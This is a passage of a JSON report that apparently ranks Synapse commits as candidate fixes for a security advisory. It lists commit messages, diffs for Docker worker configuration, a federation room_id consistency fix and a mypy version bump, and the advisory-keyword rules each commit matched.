"+ log_dir = data_dir + \"/logs\"", - "+ if not os.path.exists(log_dir):", - "+ os.mkdir(log_dir)", - "+", - "+", - "+def start_supervisord():", - "+ \"\"\"Starts up supervisord which then starts and monitors all other necessary processes", - "+", - "+ Raises: CalledProcessError if calling start.py return a non-zero exit code.", - "+ \"\"\"", - "+ subprocess.check_output([\"/usr/bin/supervisord\"])", - "+", - "+", - "+def main(args, environ):", - "+ config_dir = environ.get(\"SYNAPSE_CONFIG_DIR\", \"/data\")", - "+ config_path = environ.get(\"SYNAPSE_CONFIG_PATH\", config_dir + \"/homeserver.yaml\")", - "+ data_dir = environ.get(\"SYNAPSE_DATA_DIR\", \"/data\")", - "+", - "+ # Generate the base homeserver config if one does not yet exist", - "+ if not os.path.exists(config_path):", - "+ log(\"Generating base homeserver config\")", - "+ generate_base_homeserver_config()", - "+", - "+ # Always regenerate all other config files", - "+ generate_worker_files(environ, config_path, data_dir)", - "+", - "+ # Start supervisord, which will start Synapse, all of the configured worker", - "+ # processes, redis, nginx etc. according to the config we created above.", - "+ start_supervisord()", - "+", - "+", - "+if __name__ == \"__main__\":", - "+ main(sys.argv, os.environ)", - "diff --git a/docker/generate_shared_worker_config.py b/docker/generate_shared_worker_config.py", - "deleted file mode 100644", - "index 755a73734..000000000", - "--- a/docker/generate_shared_worker_config.py", - "+++ /dev/null", - "@@ -1,145 +0,0 @@", - "-#!/usr/bin/env python", - "-# -*- coding: utf-8 -*-", - "-# Copyright 2020 The Matrix.org Foundation C.I.C.", - "-#", - "-# Licensed under the Apache License, Version 2.0 (the \"License\");", - "-# you may not use this file except in compliance with the License.", - "-# You may obtain a copy of the License at", - "-#", - "-# http://www.apache.org/licenses/LICENSE-2.0", - "-#", - "-# Unless required by applicable law or agreed to in writing, software", - "-# distributed under the License is distributed on an \"AS IS\" BASIS,", - "-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", - "-# See the License for the specific language governing permissions and", - "-# limitations under the License.", - "-", - "-# This script reads environment variables and generates a shared Synapse worker,", - "-# nginx and supervisord configs depending on the workers requested", - "-", - "-import os", - "-import sys", - "-", - "-", - "-def main(args, environ):", - "- \"\"\"Read the desired list of workers from environment variables and generate", - "- shared homeserver, nginx and supervisord configs.", - "-", - "- Args:", - "- environ: _Environ[str]", - "- \"\"\"", - "- # The contents of this string will be appended to the one generated by", - "- # the homeserver, and is intended mainly for disabling functionality on the main", - "- # when certain workers are spun up", - "- homeserver_config = \"\"", - "-", - "- # The contents of this string will be append to the base supervisord config", - "- supervisord_config = \"\"", - "-", - "- # An nginx site config. Will live in /etc/nginx/conf.d", - "- nginx_config_template_header = \"\"\"", - "- server {", - "- listen 80;", - "- listen [::]:80;", - "-", - "- # For the federation port", - "- listen 8448 default_server;", - "- listen [::]:8448 default_server;", - "-", - "- server_name localhost;", - "- \"\"\"", - "- nginx_config_body = \"\"", - "- nginx_config_template_end = \"\"\"", - "- # Send all other traffic to the main process", - "- location ~* ^(\\/_matrix|\\/_synapse) {", - "- proxy_pass http://localhost:8008;", - "- proxy_set_header X-Forwarded-For $remote_addr;", - "-", - "- # TODO: Can we move this to the default nginx.conf so all locations are", - "- # affected?", - "- #", - "- # Nginx by default only allows file uploads up to 1M in size", - "- # Increase client_max_body_size to match max_upload_size defined in homeserver.yaml", - "- client_max_body_size 50M;", - "- }", - "- }", - "- \"\"\"", - "-", - "- # Read desired worker configuration from environment", - "- worker_types = environ.get(\"SYNAPSE_WORKERS\")", - "- worker_types = worker_types.split(\",\")", - "-", - "- for worker_type in worker_types:", - "- if worker_type == \"pusher\":", - "- # Disable push handling from the main process", - "- homeserver_config += \"\"\"", - "- start_pushers: false", - "- \"\"\"", - "-", - "- # Enable the pusher worker in supervisord", - "- supervisord_config += \"\"\"", - "- \"\"\"", - "-", - "- # This worker does not handle any REST endpoints", - "-", - "- elif worker_type == \"appservice\":", - "- # Disable appservice traffic sending from the main process", - "- homeserver_config += \"\"\"", - "- notify_appservices: false", - "- \"\"\"", - "-", - "- # Enable the pusher worker in supervisord", - "- supervisord_config += \"\"\"", - "- [program:synapse_user_dir]", - "- command=/usr/local/bin/python -m synapse.app.user_dir \\", - "- --config-path=/config/homeserver.yaml \\", - "- --config-path=/config/workers/user_dir.yaml", - "- autorestart=unexpected", - "- exitcodes=0", - "- \"\"\"", - "-", - "- # This worker does not handle any REST endpoints", - "-", - "- elif worker_type == \"user_dir\":", - "- # Disable user directory updates on the main process", - "- homeserver_config += \"\"\"", - "- update_user_directory: false", - "- \"\"\"", - "-", - "- # Enable the user directory worker in supervisord", - "- supervisord_config += \"\"\"", - "- [program:synapse_user_dir]", - "- command=/usr/local/bin/python -m synapse.app.user_dir \\", - "- --config-path=/config/homeserver.yaml \\", - "- --config-path=/config/workers/user_dir.yaml", - "- autorestart=unexpected", - "- exitcodes=0", - "- \"\"\"", - "-", - "- # Route user directory requests to this worker", - "- nginx_config_body += \"\"\"", - "- location ~* ^/_matrix/client/(api/v1|r0|unstable)/user_directory/search$ {", - "- proxy_pass http://localhost:8010;", - "- proxy_set_header X-Forwarded-For $remote_addr;", - "- }", - "- \"\"\"", - "-", - "- # Write out the config files", - "-", - "- # Main homeserver config", - "- with open(\"/config/main.yaml\", \"a\") as f:", - "- f.write(homeserver_config)", - "-", - "- # Nginx config", - "- with open(\"/config/nginx.conf\", \"w\") as f:", - "- f.write(nginx_config_template_header)", - "- f.write(nginx_config_body)", - "- f.write(nginx_config_template_end)", - "-", - "- # Supervisord config", - "- with open(\"/config/supervisord.conf\", \"a\") as f:", - "- f.write(supervisord_config)", - "-", - "-", - "-if __name__ == \"__main__\":", - "- main(sys.argv, os.environ)", - "diff --git a/docker/worker_conf/main.conf b/docker/worker_conf/main.conf", - "deleted file mode 100644", - "index 917b82500..000000000", - "--- a/docker/worker_conf/main.conf", - "+++ /dev/null", - "@@ -1,9 +0,0 @@", - "-# A bit of Synapse config file that will be appended to the main homeserver config file.", - "-# It is intended for generate_shared_worker_config.py to add entries to this file to", - "-# disable functionality as equivalent workers are spun up.", - "-", - "-# TODO: extend the existing `listeners` section. This defines the ports that the", - "-# main process will listen on.", - "-", - "-redis:", - "- enabled: true", - "diff --git a/docker/worker_conf/supervisord.conf b/docker/worker_conf/supervisord.conf", - "deleted file mode 100644", - "index 63c898e75..000000000", - "--- a/docker/worker_conf/supervisord.conf", - "+++ /dev/null", - "@@ -1,19 +0,0 @@", - "-[supervisord]", - "-nodaemon=true", - "-", - "-[program:nginx]", - "-command=/usr/sbin/nginx -g \"daemon off;\"", - "-priority=900", - "-stdout_logfile= /dev/stdout", - "-stdout_logfile_maxbytes=0", - "-stderr_logfile=/dev/stderr", - "-stderr_logfile_maxbytes=0", - "-username=www-data", - "-autorestart=true", - "-", - "-[program:synapse_main]", - "-command=/usr/local/bin/python -m synapse.app.homeserver \\", - "- --config-path=/config/homeserver.yaml \\", - "- --config-path=/config/main.yaml", - "-autorestart=unexpected", - "-exitcodes=0", - "diff --git a/docker/workers/log_config_templates/pusher_log.yaml b/docker/workers/log_config_templates/pusher_log.yaml", - "new file mode 100644", - "index 000000000..c2563242a", - "--- /dev/null", - "+++ b/docker/workers/log_config_templates/pusher_log.yaml", - "@@ -0,0 +1,30 @@", - "+version: 1", - "+", - "+formatters:", - "+ precise:", - "+ format: '%(asctime)s - %(name)s - %(lineno)d - %(levelname)s - %(request)s - %(message)s'", - "+", - "+handlers:", - "+ file:", - "+ class: logging.handlers.TimedRotatingFileHandler", - "+ formatter: precise", - "+ filename: \"{{ SYNAPSE_DATA_DIR or '/data' }}/logs/pusher1.log\"", - "+ when: midnight", - "+ backupCount: 3 # Does not include the current log file.", - "+ encoding: utf8", - "+", - "+ console:", - "+ class: logging.StreamHandler", - "+ formatter: precise", - "+", - "+loggers:", - "+ synapse.storage.SQL:", - "+ # beware: increasing this to DEBUG will make synapse log sensitive", - "+ # information such as access tokens.", - "+ level: INFO", - "+", - "+root:", - "+ level: {{ SYNAPSE_LOG_LEVEL or \"INFO\" }}", - "+ handlers: [console]", - "+", - "+disable_existing_loggers: false", - "\\ No newline at end of file", - "diff --git a/docker/workers/log_config_templates/user_dir_log.yaml b/docker/workers/log_config_templates/user_dir_log.yaml", - "new file mode 100644", - "index 000000000..c2563242a", - "--- /dev/null", - "+++ b/docker/workers/log_config_templates/user_dir_log.yaml", - "@@ -0,0 +1,30 @@", - "+version: 1", - "+", - "+formatters:", - "+ precise:", - "+ format: '%(asctime)s - %(name)s - %(lineno)d - %(levelname)s - %(request)s - %(message)s'", - "+", - "+handlers:", - "+ file:", - "+ class: logging.handlers.TimedRotatingFileHandler", - "+ formatter: precise", - "+ filename: \"{{ SYNAPSE_DATA_DIR or '/data' }}/logs/pusher1.log\"", - "+ when: midnight", - "+ backupCount: 3 # Does not include the current log file.", - "+ encoding: utf8", - "+", - "+ console:", - "+ class: logging.StreamHandler", - "+ formatter: precise", - "+", - "+loggers:", - "+ synapse.storage.SQL:", - "+ # beware: increasing this to DEBUG will make synapse log sensitive", - "+ # information such as access tokens.", - "+ level: INFO", - "+", - "+root:", - "+ level: {{ SYNAPSE_LOG_LEVEL or \"INFO\" }}", - "+ handlers: [console]", - "+", - "+disable_existing_loggers: false", - "\\ No newline at end of file", - "diff --git a/docker/workers/pusher.yaml b/docker/workers/pusher.yaml", - "new file mode 100644", - "index 000000000..bf1ccf413", - "--- /dev/null", - "+++ b/docker/workers/pusher.yaml", - "@@ -0,0 +1,13 @@", - "+worker_app: synapse.app.pusher", - "+worker_name: pusher", - "+", - "+# The replication listener on the main synapse process.", - "+worker_replication_host: 127.0.0.1", - "+worker_replication_http_port: 9093", - "+", - "+worker_listeners:", - "+ - type: http", - "+ port: 8083", - "+ resources: []", - "+", - "+worker_log_config: /conf/workers/pusher_log.yaml", - "\\ No newline at end of file", - "diff --git a/docker/workers/user_dir.yaml b/docker/workers/user_dir.yaml", - "new file mode 100644", - "index 000000000..8f5deaf37", - "--- /dev/null", - "+++ b/docker/workers/user_dir.yaml", - "@@ -0,0 +1,13 @@", - "+worker_app: synapse.app.user_dir", - "+worker_name: user_dir", - "+", - "+# The replication listener on the main synapse process.", - "+worker_replication_host: 127.0.0.1", - "+worker_replication_http_port: 9093", - "+", - "+worker_listeners:", - "+ - type: http", - "+ port: 8084", - "+ resources: []", - "+", - "+worker_log_config: /conf/workers/user_dir_log.yaml", - "\\ No newline at end of file" - ], - "changed_files": [ - "docker/Dockerfile-workers", - "docker/configure_workers_and_start.py", - "docker/generate_shared_worker_config.py", - "docker/worker_conf/main.conf", - "docker/worker_conf/supervisord.conf", - "docker/workers/log_config_templates/pusher_log.yaml", - "docker/workers/log_config_templates/user_dir_log.yaml", - "docker/workers/pusher.yaml", - "docker/workers/user_dir.yaml" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: matrix-synapse", - "relevance": 8 - }, - { - "id": "ADV_KEYWORDS_IN_FILES", - "message": "An advisory keyword is contained in the changed files: file", - "relevance": 4 - } - ] - }, - { - "commit_id": "3ce2f303f15f6ac3dc352298972dc6e04d9b7a8b", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1605780333, - "hunks": 32, - "message": "Consistently use room_id from federation request body (#8776) * Consistently use room_id from federation request body Some federation APIs have a redundant `room_id` path param (see https://github.com/matrix-org/matrix-doc/issues/2330). We should make sure we consistently use either the path param or the body param, and the body param is easier. * Kill off some references to \"context\" Once upon a time, \"rooms\" were known as \"contexts\". I think this kills of the last references to \"contexts\".", - "diff": [ - "diff --git a/changelog.d/8776.bugfix b/changelog.d/8776.bugfix", - "new file mode 100644", - "index 000000000..dd7ebbeb8", - "--- /dev/null", - "+++ b/changelog.d/8776.bugfix", - "@@ -0,0 +1 @@", - "+Fix a bug in some federation APIs which could lead to unexpected behaviour if different parameters were set in the URI and the request body.", - "diff --git a/synapse/federation/federation_server.py b/synapse/federation/federation_server.py", - "index 23278e36b..4b6ab470d 100644", - "--- a/synapse/federation/federation_server.py", - "+++ b/synapse/federation/federation_server.py", - "@@ -51,2 +51,3 @@ from synapse.federation.units import Edu, Transaction", - " from synapse.http.endpoint import parse_server_name", - "+from synapse.http.servlet import assert_params_in_dict", - " from synapse.logging.context import (", - "@@ -393,3 +394,3 @@ class FederationServer(FederationBase):", - "- async def on_context_state_request(", - "+ async def on_room_state_request(", - " self, origin: str, room_id: str, event_id: str", - "@@ -516,3 +517,3 @@ class FederationServer(FederationBase):", - " async def on_send_join_request(", - "- self, origin: str, content: JsonDict, room_id: str", - "+ self, origin: str, content: JsonDict", - " ) -> Dict[str, Any]:", - "@@ -520,3 +521,4 @@ class FederationServer(FederationBase):", - "- room_version = await self.store.get_room_version(room_id)", - "+ assert_params_in_dict(content, [\"room_id\"])", - "+ room_version = await self.store.get_room_version(content[\"room_id\"])", - " pdu = event_from_pdu_json(content, room_version)", - "@@ -549,8 +551,7 @@ class FederationServer(FederationBase):", - "- async def on_send_leave_request(", - "- self, origin: str, content: JsonDict, room_id: str", - "- ) -> dict:", - "+ async def on_send_leave_request(self, origin: str, content: JsonDict) -> dict:", - " logger.debug(\"on_send_leave_request: content: %s\", content)", - "- room_version = await self.store.get_room_version(room_id)", - "+ assert_params_in_dict(content, [\"room_id\"])", - "+ room_version = await self.store.get_room_version(content[\"room_id\"])", - " pdu = event_from_pdu_json(content, room_version)", - "@@ -750,8 +751,4 @@ class FederationServer(FederationBase):", - "- async def on_exchange_third_party_invite_request(", - "- self, room_id: str, event_dict: Dict", - "- ):", - "- ret = await self.handler.on_exchange_third_party_invite_request(", - "- room_id, event_dict", - "- )", - "+ async def on_exchange_third_party_invite_request(self, event_dict: Dict):", - "+ ret = await self.handler.on_exchange_third_party_invite_request(event_dict)", - " return ret", - "diff --git a/synapse/federation/transport/server.py b/synapse/federation/transport/server.py", - "index a0933fae8..b53e7a20e 100644", - "--- a/synapse/federation/transport/server.py", - "+++ b/synapse/federation/transport/server.py", - "@@ -442,9 +442,9 @@ class FederationEventServlet(BaseFederationServlet):", - " class FederationStateV1Servlet(BaseFederationServlet):", - "- PATH = \"/state/(?P[^/]*)/?\"", - "+ PATH = \"/state/(?P[^/]*)/?\"", - "- # This is when someone asks for all data for a given context.", - "- async def on_GET(self, origin, content, query, context):", - "- return await self.handler.on_context_state_request(", - "+ # This is when someone asks for all data for a given room.", - "+ async def on_GET(self, origin, content, query, room_id):", - "+ return await self.handler.on_room_state_request(", - " origin,", - "- context,", - "+ room_id,", - " parse_string_from_args(query, \"event_id\", None, required=False),", - "@@ -465,5 +465,5 @@ class FederationStateIdsServlet(BaseFederationServlet):", - " class FederationBackfillServlet(BaseFederationServlet):", - "- PATH = \"/backfill/(?P[^/]*)/?\"", - "+ PATH = \"/backfill/(?P[^/]*)/?\"", - "- async def on_GET(self, origin, content, query, context):", - "+ async def on_GET(self, origin, content, query, room_id):", - " versions = [x.decode(\"ascii\") for x in query[b\"v\"]]", - "@@ -474,3 +474,3 @@ class FederationBackfillServlet(BaseFederationServlet):", - "- return await self.handler.on_backfill_request(origin, context, versions, limit)", - "+ return await self.handler.on_backfill_request(origin, room_id, versions, limit)", - "@@ -489,5 +489,5 @@ class FederationQueryServlet(BaseFederationServlet):", - " class FederationMakeJoinServlet(BaseFederationServlet):", - "- PATH = \"/make_join/(?P[^/]*)/(?P[^/]*)\"", - "+ PATH = \"/make_join/(?P[^/]*)/(?P[^/]*)\"", - "- async def on_GET(self, origin, _content, query, context, user_id):", - "+ async def on_GET(self, origin, _content, query, room_id, user_id):", - " \"\"\"", - "@@ -513,3 +513,3 @@ class FederationMakeJoinServlet(BaseFederationServlet):", - " content = await self.handler.on_make_join_request(", - "- origin, context, user_id, supported_versions=supported_versions", - "+ origin, room_id, user_id, supported_versions=supported_versions", - " )", - "@@ -519,6 +519,6 @@ class FederationMakeJoinServlet(BaseFederationServlet):", - " class FederationMakeLeaveServlet(BaseFederationServlet):", - "- PATH = \"/make_leave/(?P[^/]*)/(?P[^/]*)\"", - "+ PATH = \"/make_leave/(?P[^/]*)/(?P[^/]*)\"", - "- async def on_GET(self, origin, content, query, context, user_id):", - "- content = await self.handler.on_make_leave_request(origin, context, user_id)", - "+ async def on_GET(self, origin, content, query, room_id, user_id):", - "+ content = await self.handler.on_make_leave_request(origin, room_id, user_id)", - " return 200, content", - "@@ -530,3 +530,3 @@ class FederationV1SendLeaveServlet(BaseFederationServlet):", - " async def on_PUT(self, origin, content, query, room_id, event_id):", - "- content = await self.handler.on_send_leave_request(origin, content, room_id)", - "+ content = await self.handler.on_send_leave_request(origin, content)", - " return 200, (200, content)", - "@@ -540,3 +540,3 @@ class FederationV2SendLeaveServlet(BaseFederationServlet):", - " async def on_PUT(self, origin, content, query, room_id, event_id):", - "- content = await self.handler.on_send_leave_request(origin, content, room_id)", - "+ content = await self.handler.on_send_leave_request(origin, content)", - " return 200, content", - "@@ -545,6 +545,6 @@ class FederationV2SendLeaveServlet(BaseFederationServlet):", - " class FederationEventAuthServlet(BaseFederationServlet):", - "- PATH = \"/event_auth/(?P[^/]*)/(?P[^/]*)\"", - "+ PATH = \"/event_auth/(?P[^/]*)/(?P[^/]*)\"", - "- async def on_GET(self, origin, content, query, context, event_id):", - "- return await self.handler.on_event_auth(origin, context, event_id)", - "+ async def on_GET(self, origin, content, query, room_id, event_id):", - "+ return await self.handler.on_event_auth(origin, room_id, event_id)", - "@@ -552,8 +552,8 @@ class FederationEventAuthServlet(BaseFederationServlet):", - " class FederationV1SendJoinServlet(BaseFederationServlet):", - "- PATH = \"/send_join/(?P[^/]*)/(?P[^/]*)\"", - "+ PATH = \"/send_join/(?P[^/]*)/(?P[^/]*)\"", - "- async def on_PUT(self, origin, content, query, context, event_id):", - "- # TODO(paul): assert that context/event_id parsed from path actually", - "+ async def on_PUT(self, origin, content, query, room_id, event_id):", - "+ # TODO(paul): assert that room_id/event_id parsed from path actually", - " # match those given in content", - "- content = await self.handler.on_send_join_request(origin, content, context)", - "+ content = await self.handler.on_send_join_request(origin, content)", - " return 200, (200, content)", - "@@ -562,3 +562,3 @@ class FederationV1SendJoinServlet(BaseFederationServlet):", - " class FederationV2SendJoinServlet(BaseFederationServlet):", - "- PATH = \"/send_join/(?P[^/]*)/(?P[^/]*)\"", - "+ PATH = \"/send_join/(?P[^/]*)/(?P[^/]*)\"", - "@@ -566,6 +566,6 @@ class FederationV2SendJoinServlet(BaseFederationServlet):", - "- async def on_PUT(self, origin, content, query, context, event_id):", - "- # TODO(paul): assert that context/event_id parsed from path actually", - "+ async def on_PUT(self, origin, content, query, room_id, event_id):", - "+ # TODO(paul): assert that room_id/event_id parsed from path actually", - " # match those given in content", - "- content = await self.handler.on_send_join_request(origin, content, context)", - "+ content = await self.handler.on_send_join_request(origin, content)", - " return 200, content", - "@@ -574,5 +574,5 @@ class FederationV2SendJoinServlet(BaseFederationServlet):", - " class FederationV1InviteServlet(BaseFederationServlet):", - "- PATH = \"/invite/(?P[^/]*)/(?P[^/]*)\"", - "+ PATH = \"/invite/(?P[^/]*)/(?P[^/]*)\"", - "- async def on_PUT(self, origin, content, query, context, event_id):", - "+ async def on_PUT(self, origin, content, query, room_id, event_id):", - " # We don't get a room version, so we have to assume its EITHER v1 or", - "@@ -591,3 +591,3 @@ class FederationV1InviteServlet(BaseFederationServlet):", - " class FederationV2InviteServlet(BaseFederationServlet):", - "- PATH = \"/invite/(?P[^/]*)/(?P[^/]*)\"", - "+ PATH = \"/invite/(?P[^/]*)/(?P[^/]*)\"", - "@@ -595,4 +595,4 @@ class FederationV2InviteServlet(BaseFederationServlet):", - "- async def on_PUT(self, origin, content, query, context, event_id):", - "- # TODO(paul): assert that context/event_id parsed from path actually", - "+ async def on_PUT(self, origin, content, query, room_id, event_id):", - "+ # TODO(paul): assert that room_id/event_id parsed from path actually", - " # match those given in content", - "@@ -618,5 +618,3 @@ class FederationThirdPartyInviteExchangeServlet(BaseFederationServlet):", - " async def on_PUT(self, origin, content, query, room_id):", - "- content = await self.handler.on_exchange_third_party_invite_request(", - "- room_id, content", - "- )", - "+ content = await self.handler.on_exchange_third_party_invite_request(content)", - " return 200, content", - "diff --git a/synapse/handlers/federation.py b/synapse/handlers/federation.py", - "index c38695770..e03caea25 100644", - "--- a/synapse/handlers/federation.py", - "+++ b/synapse/handlers/federation.py", - "@@ -57,2 +57,3 @@ from synapse.events.validator import EventValidator", - " from synapse.handlers._base import BaseHandler", - "+from synapse.http.servlet import assert_params_in_dict", - " from synapse.logging.context import (", - "@@ -2688,3 +2689,3 @@ class FederationHandler(BaseHandler):", - " async def on_exchange_third_party_invite_request(", - "- self, room_id: str, event_dict: JsonDict", - "+ self, event_dict: JsonDict", - " ) -> None:", - "@@ -2696,8 +2697,7 @@ class FederationHandler(BaseHandler):", - " Args:", - "- room_id: The ID of the room.", - "-", - "- event_dict (dict[str, Any]): Dictionary containing the event body.", - "+ event_dict: Dictionary containing the event body.", - " \"\"\"", - "- room_version = await self.store.get_room_version_id(room_id)", - "+ assert_params_in_dict(event_dict, [\"room_id\"])", - "+ room_version = await self.store.get_room_version_id(event_dict[\"room_id\"])", - "diff --git a/tests/handlers/test_federation.py b/tests/handlers/test_federation.py", - "index 9ef80fe50..bf866dacf 100644", - "--- a/tests/handlers/test_federation.py", - "+++ b/tests/handlers/test_federation.py", - "@@ -61,3 +61,2 @@ class FederationTestCase(unittest.HomeserverTestCase):", - " d = self.handler.on_exchange_third_party_invite_request(", - "- room_id=room_id,", - " event_dict={" - ], - "changed_files": [ - "changelog.d/8776.bugfix", - "synapse/federation/federation_server.py", - "synapse/federation/transport/server.py", - "synapse/handlers/federation.py", - "tests/handlers/test_federation.py" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": { - "8776": "" - }, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.23.1", - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [ - { - "id": "ADV_KEYWORDS_IN_MSG", - "message": "The commit message and the advisory description contain the following keywords: reference, issue, request, federation, know", - "relevance": 4 - }, - { - "id": "ADV_KEYWORDS_IN_FILES", - "message": "An advisory keyword is contained in the changed files: server, federation", - "relevance": 4 - }, - { - "id": "GITHUB_ISSUE_IN_MESSAGE", - "message": "The commit message references some github issue: 8776", - "relevance": 2 - } - ] - }, - { - "commit_id": "8a02d38ce274db40e5629c882af1fefdb8c9adc3", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1607689969, - "hunks": 7, - "message": "Update mypy to 0.790 to resolve mypy CI errors (#72)", - "diff": [ - "diff --git a/changelog.d/72.bugfix b/changelog.d/72.bugfix", - "new file mode 100644", - "index 000000000..7ebd16f43", - "--- /dev/null", - "+++ b/changelog.d/72.bugfix", - "@@ -0,0 +1 @@", - "+Update the version of mypy to 0.790.", - "diff --git a/synapse/handlers/auth.py b/synapse/handlers/auth.py", - "index 00eae9205..8770e4363 100644", - "--- a/synapse/handlers/auth.py", - "+++ b/synapse/handlers/auth.py", - "@@ -1117,3 +1117,3 @@ class AuthHandler(BaseHandler):", - "- def _do_validate_hash():", - "+ def _do_validate_hash(checked_hash: bytes):", - " # Normalise the Unicode in the password", - "@@ -1123,3 +1123,3 @@ class AuthHandler(BaseHandler):", - " pw.encode(\"utf8\") + self.hs.config.password_pepper.encode(\"utf8\"),", - "- stored_hash,", - "+ checked_hash,", - " )", - "@@ -1130,3 +1130,5 @@ class AuthHandler(BaseHandler):", - "- return await defer_to_thread(self.hs.get_reactor(), _do_validate_hash)", - "+ return await defer_to_thread(", - "+ self.hs.get_reactor(), _do_validate_hash, stored_hash", - "+ )", - " else:", - "diff --git a/synapse/python_dependencies.py b/synapse/python_dependencies.py", - "index 0ddead8a0..3e188cd4d 100644", - "--- a/synapse/python_dependencies.py", - "+++ b/synapse/python_dependencies.py", - "@@ -109,2 +109,4 @@ CONDITIONAL_REQUIREMENTS = {", - "+CONDITIONAL_REQUIREMENTS[\"mypy\"] = [\"mypy==0.790\", \"mypy-zope==0.2.8\"]", - "+", - " ALL_OPTIONAL_REQUIREMENTS = set() # type: Set[str]", - "diff --git a/tox.ini b/tox.ini", - "index 0a2d14aec..300417287 100644", - "--- a/tox.ini", - "+++ b/tox.ini", - "@@ -161,8 +161,5 @@ commands=", - " [testenv:mypy]", - "-skip_install = True", - " deps =", - " {[base]deps}", - "- mypy==0.782", - "- mypy-zope", - "-extras = all", - "+extras = all, mypy", - " commands = mypy" - ], - "changed_files": [ - "changelog.d/72.bugfix", - "synapse/handlers/auth.py", - "synapse/python_dependencies.py", - "tox.ini" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": { - "72": "" - }, - "cve_refs": [], - "twins": [], - "tags": [], - "matched_rules": [ - { - "id": "ADV_KEYWORDS_IN_MSG", - "message": "The commit message and the advisory description contain the 